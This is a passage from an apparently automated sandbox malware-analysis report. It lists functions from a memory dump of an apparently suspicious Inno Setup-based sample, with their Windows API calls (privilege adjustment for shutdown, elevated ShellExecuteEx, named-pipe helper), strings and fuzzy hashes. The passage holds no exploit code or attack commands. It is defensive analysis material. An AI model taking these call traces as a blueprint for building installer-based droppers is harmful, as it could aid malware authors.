                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                  • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                                                                                                                                                  • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040170C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00003078,0000707B,00401973), ref: 00401766
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                  • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                                                                                                                                                  • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406F48 Relevance: 1.3, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                  • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                                                                                                                                                  • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 0041F118 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                                                                                                                                                  • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                                                                                                                                                  • API String ID: 2323315520-3614243559
                                                                                                                                                                                                                                  • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                                                                                                                                                  • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004585C8 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0045862F
                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(020A3858,00000000,004588C2,?,?,020A3858,00000000,?,00458FBE,?,020A3858,00000000), ref: 00458638
                                                                                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(020A3858,020A3858), ref: 00458642
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,020A3858,00000000,004588C2,?,?,020A3858,00000000,?,00458FBE,?,020A3858,00000000), ref: 0045864B
                                                                                                                                                                                                                                  • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,020A3858,020A3858), ref: 004586CF
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                                                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                                                                                                                                                                    • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                                                                                                                                                                    • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                                                                                                                                                  • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                                                                                                                                                  • API String ID: 770386003-3271284199
                                                                                                                                                                                                                                  • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                                                                                                                                                  • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00478504 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,020A2BF4,?,?,?,020A2BF4,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                                                                                                                                                    • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                                                                                                                                                    • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,020A2BF4,?,?,?,020A2BF4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                                                                                                                                                    • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,020A2BF4,?,?,?,020A2BF4), ref: 004783CC
                                                                                                                                                                                                                                    • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,020A2BF4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                                                                                                                                                    • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,020A2BF4,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                                                                                                                                                                  • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                                                                                                                                                  • API String ID: 883996979-221126205
                                                                                                                                                                                                                                  • Opcode ID: d94476177e89f61339d65e5f577ff2872d1a8d23f03fec93f8535f7d0bd6bb56
                                                                                                                                                                                                                                  • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d94476177e89f61339d65e5f577ff2872d1a8d23f03fec93f8535f7d0bd6bb56
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042285C Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSendShowWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1631623395-0
                                                                                                                                                                                                                                  • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                                                                                                                                                  • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00418384 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 00418393
                                                                                                                                                                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?), ref: 004183CC
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                                                                                                                                                                  • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                                                                                                                                  • String ID: ,
                                                                                                                                                                                                                                  • API String ID: 2266315723-3772416878
                                                                                                                                                                                                                                  • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                                                                                                                                                  • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004555E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                  • API String ID: 107509674-3733053543
                                                                                                                                                                                                                                  • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                                                                                                                                                  • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0045D188 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                                                                                                                                                                  • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$CryptVersion
                                                                                                                                                                                                                                  • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                                                                                                                                                  • API String ID: 1951258720-508647305
                                                                                                                                                                                                                                  • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                                                                                                                                                  • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
